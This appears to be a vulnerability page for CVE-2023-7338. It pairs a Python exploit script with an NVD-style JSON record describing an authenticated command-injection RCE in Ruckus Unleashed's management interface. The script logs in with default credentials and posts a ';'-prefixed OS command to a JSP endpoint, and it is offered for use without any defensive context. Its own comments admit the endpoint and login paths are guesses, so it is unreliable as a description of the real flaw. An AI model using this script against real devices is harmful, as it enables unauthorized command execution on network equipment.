CVE-2023-7338

import requests # Target configuration # Replace with the actual IP and vulnerable endpoint path target_url = "http://<target-ip>/admin/_cmdstat.jsp" # Example endpoint, adjust based on actual vulnerability username = "admin" password = "password" def exploit_rce(target, user, pwd, cmd): session = requests.Session() # 1. Authenticate to the management interface # Note: The login endpoint may vary, this is a generic example login_payload = { "username": user, "password": pwd } try: print(f"[*] Attempting login to {target}...") # Adjust the login URL based on the specific application logic login_resp = session.post(target.replace("_cmdstat.jsp", "login.jsp"), data=login_payload, timeout=10) if login_resp.status_code != 200 or "dashboard" not in login_resp.text.lower(): print("[-] Login failed or session not established.") return print("[+] Login successful.") # 2. Send malicious payload to trigger RCE # The payload injects a command to be executed by the OS # Example payload using command injection syntax injection_payload = { "cmd": f"; {cmd}" } print(f"[*] Sending payload: {injection_payload}") exploit_resp = session.post(target, data=injection_payload, timeout=10) print(f"[+] Exploit sent. Status: {exploit_resp.status_code}") print("[+] Response received:") print(exploit_resp.text[:200]) # Print part of response to verify execution except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Example usage: execute 'id' or 'ping' command # Ensure the target is in Gateway Mode as per the vulnerability description exploit_rce(target_url, username, password, "id")

{"cve": {"id": "CVE-2023-7338", "sourceIdentifier": "[email protected]", "published": "2026-03-26T20:16:08.853", "lastModified": "2026-03-30T13:26:50.827", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ruckus Unleashed contains a remote code execution vulnerability in the web-based management interface that allows authenticated remote attackers to execute arbitrary code on the system when gateway mode is enabled. Attackers can exploit this vulnerability by sending specially crafted requests through the management interface to achieve arbitrary code execution on affected systems."}, {"lang": "es", "value": "Ruckus Unleashed contiene una vulnerabilidad de ejecución remota de código en la interfaz de gestión basada en web que permite a atacantes remotos autenticados ejecutar código arbitrario en el sistema cuando el modo de pasarela está habilitado. Los atacantes pueden explotar esta vulnerabilidad enviando solicitudes especialmente diseñadas a través de la interfaz de gestión para lograr la ejecución de código arbitrario en los sistemas afectados."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://support.ruckuswireless.com/security_bulletins/320", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/ruckus-unleashed-authenticated-rce-in-gateway-mode", "source": "[email protected]"}]}}